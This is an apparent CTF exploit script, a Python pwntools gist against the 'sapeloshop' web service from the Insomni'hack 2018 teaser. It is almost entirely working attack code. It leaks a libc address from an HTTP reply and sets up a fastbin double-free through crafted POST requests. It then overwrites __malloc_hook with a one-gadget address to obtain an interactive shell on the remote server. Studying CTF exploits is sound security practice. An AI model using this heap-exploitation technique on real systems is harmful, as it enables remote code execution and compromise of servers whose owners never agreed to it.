@romanking98
Created January 22, 2018 13:37
#!/usr/bin/python
from pwn import *
# Target libc; loaded but never referenced again in this script.
elf = ELF("./libc-2.23.so")
#r = remote("http://sapeloshop.teaser.insomnihack.ch",80)
# One shared keep-alive connection; every helper below writes to and reads from it.
r = remote('sapeloshop.teaser.insomnihack.ch', 80)
#r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"})
# Manual pause before the first request goes out (presumably to attach a debugger).
raw_input()
# Same value as int("3d714", 16); never read afterwards (the for-loop further down rebinds i).
i = 0x3d714
def get(where):
    """Send an HTTP/1.1 GET for *where* on the shared connection and return the raw reply.

    The reply is consumed up to and including the ``Content-Length`` line and
    then that many bytes plus one; the whole exchange is echoed to stdout.
    """
    request = (
        "GET %s HTTP/1.1\r\n"
        "Host: 127.0.0.1:31337\r\n"
        "User-Agent: pewpew\r\n"
        "Connection: keep-alive\r\n"
        "\r\n"
    )
    r.write(request % where)
    reply = r.readuntil('Content-Length: ')
    length_line = r.readline()
    reply += length_line
    # The extra byte presumably swallows a trailing newline after the body — confirm against the server.
    body_len = int(length_line.strip()) + 1
    reply += r.recvn(body_len)
    print "========== GET", where
    print reply
    print "-" * 100
    return reply
def post(where, what):
    """POST the form body *what* to *where* on the shared connection and return the raw reply.

    Mirrors get(): the reply is read through the ``Content-Length`` line and
    then that many bytes plus one, and the exchange is echoed to stdout.
    """
    headers = (
        "POST %s HTTP/1.1\r\n"
        "Host: 127.0.0.1:31337\r\n"
        "User-Agent: pewpew\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: %d\r\n"
        "Connection: keep-alive\r\n"
        "\r\n"
    )
    r.write(headers % (where, len(what)) + what)
    reply = r.readuntil('Content-Length: ')
    length_line = r.readline()
    reply += length_line
    # Same +1 as in get(); presumably a trailing newline after the body — confirm against the server.
    body_len = int(length_line.strip()) + 1
    reply += r.recvn(body_len)
    print "========== POST %s: %s" % (where, what)
    print reply
    print "-" * 100
    return reply
def post2(where, what):
    """Fire-and-forget variant of post(): send the request and do not read any reply.

    Used once, right before dropping to the interactive shell, so the reply
    (if any) stays in the socket buffer for interactive() to show.
    """
    headers = (
        "POST %s HTTP/1.1\r\n"
        "Host: 127.0.0.1:31337\r\n"
        "User-Agent: pewpew\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: %d\r\n"
        "Connection: keep-alive\r\n"
        "\r\n"
    )
    r.write(headers % (where, len(what)) + what)
# Script body: every "desc=<payload>" form body becomes one shop item via /add;
# /inc, /sub and /del act on an item index. The item sizes below are fixed
# constants — presumably tuned to the server's allocator, not to the HTTP layer.
get("/")
# Three 90-byte descriptions, posted later in the "attack" phase.
desc1 = "desc="
desc1 += "A"*90
desc2 = "desc="
desc2 += "B"*90
desc3 = "desc="
desc3 += "C"*90
# Two 200-byte items are added first.
buf1 = "desc="
buf1 += "X"*200
post("/add",buf1)
buf2 = "desc="
buf2 += "Y"*200
post("/add",buf2)
# inc / sub / sub / inc on item 0 — the same four-step sequence is repeated
# on item 2 below; what it does server-side is not visible from this script.
post("/inc","item=0")
post("/sub", "item=0")
post("/sub", "item=0")
post("/inc","item=0")
# Cleanup heap.
# The /del reply page is the source of the leaked value: it is split on the
# "><img src=" marker and the fragment right after the one containing
# "col-md-8" is kept.
leak = post("/del","item=1")
leak = leak.split("><img src=")
for i in range(len(leak)):
    if "col-md-8" in leak[i]:
        # NOTE: rebinds `leak` from the list to a str while the loop is still
        # running; later iterations then index the str and may raise
        # IndexError if the str is shorter than the remaining indices.
        leak = leak[i+1]
# Bytes 5..10 of that fragment, zero-padded to 8 bytes, decoded little-endian;
# the constant subtracted turns it into the base that the offsets below are added to.
leak = leak[5:11] + "\x00"*2
leak = u64(leak) - 0x3c4b78
# One 0x1b0-byte item (0x1b0 counts the "desc=" prefix) and one 1-byte item.
sol = "desc="
sol += "B"*(0x1b0-5)
post("/add",sol)
post("/add","desc=A")
# Start attack.
post("/add", desc1)
post("/add", desc2)
post("/add", desc3)
post("/inc", "item=2")
post("/sub", "item=2")
post("/sub", "item=2")
post("/inc", "item=2")
post("/del", "item=3")
post("/sub", "item=2")
# Fastbin freelist : A -> B -> A
# Control FD of A in first allocation.
# first allocation -- set FD to __malloc_hook.
# 4th allocation will be near __malloc_hook.
# fin1 is built but never posted; the items actually sent are fin2..fin5.
fin1 = "desc="
fin1 += "D"*90
malloc_hook = p64(leak + 0x3c4aed)
print hex(leak)
# Second manual pause, after the leak is known and before anything is written.
raw_input()
# Only the low 6 bytes of the packed address are sent raw; the two high
# zero bytes are URL-encoded because a raw NUL would end the form field.
fin2 = "desc="
fin2 += malloc_hook[0:6]
fin2 += "%00%00" # URL encoding of NULL bytes.
fin2 += "E"*78
fin3 = "desc="
fin3 += "F"*90
fin4 = "desc="
fin4 += "G"*90
# fin5 decodes to 90 bytes like desc1..desc3: 19 + 8 (address) + 63.
fin5 = "desc="
fin5 += "H"*19
# Three candidate offsets; only the last assignment is used, the first two are dead.
system = leak + 0x45216
system = leak + 0xf1147
system = leak + 0xf02a4
fin5 += p64(system)[0:6]
fin5 += "%00%00"
fin5 += "H"*(90-27)
post("/add", fin2)
post("/add", fin3)
post("/add", fin4)
post("/add", fin5)
# post2() does not read a reply, so whatever the server sends back is left
# for interactive() below.
post2("/add","desc=DASJKDAS")
#post("/sub", "item=0")
#post("/del", "item=1")
#post
r.interactive()